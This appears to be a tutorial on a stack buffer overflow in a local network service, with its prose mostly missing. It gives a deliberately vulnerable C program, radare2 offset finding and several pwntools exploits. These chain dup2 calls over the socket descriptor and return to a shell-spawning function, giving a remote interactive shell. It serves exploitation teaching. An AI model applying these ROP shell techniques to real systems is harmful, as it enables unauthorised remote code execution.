Duplicating the Descriptors
void vuln(int childfd) {
char buffer[30];
read(childfd, buffer, 500);
write(childfd, "Thanks!", 8);
}
void win() {
system("/bin/sh");
}from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)payload = b'AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA'
pause()
p.sendline(payload)$ r2 -d -A $(pidof vuln)
[0x7f741033bdee]> pdf @ sym.vuln
[...]
â”” 0x0040126b c3 ret
[0x7f741033bdee]> db 0x0040126b
[0x7f741033bdee]> dc
hit breakpoint at: 40126b
[0x0040126b]> pxq @ rsp
0x7ffd323ee6f8 0x41415041414f4141 0x4153414152414151 AAOAAPAAQAARAASA
[...]
[0x0040126b]> wopO 0x41415041414f4141
40payload = flat(
'A' * 40,
elf.sym['win']
)
p.sendline(payload)
p.interactive()$ ROPgadget --binary vuln | grep "pop rdi"
0x000000000040150b : pop rdi ; ret
$ ROPgadget --binary vuln | grep "pop rsi"
0x0000000000401509 : pop rsi ; pop r15 ; retPOP_RDI = 0x40150b
POP_RSI_R15 = 0x401509 payload = flat(
'A' * 40,
POP_RDI,
4, # newfd
POP_RSI_R15,
0, # oldfd -> stdin
0, # junk r15
elf.plt['dup2'],
POP_RDI,
4, # newfd
POP_RSI_R15,
1, # oldfd -> stdout
0, # junk r15
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
payload = flat(
'A' * 40,
POP_RDI,
4, # newfd
POP_RSI_R15,
0, # oldfd -> stdin
0, # junk r15
elf.plt['dup2'],
POP_RDI,
4, # newfd
POP_RSI_R15,
1, # oldfd -> stdout
0, # junk r15
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
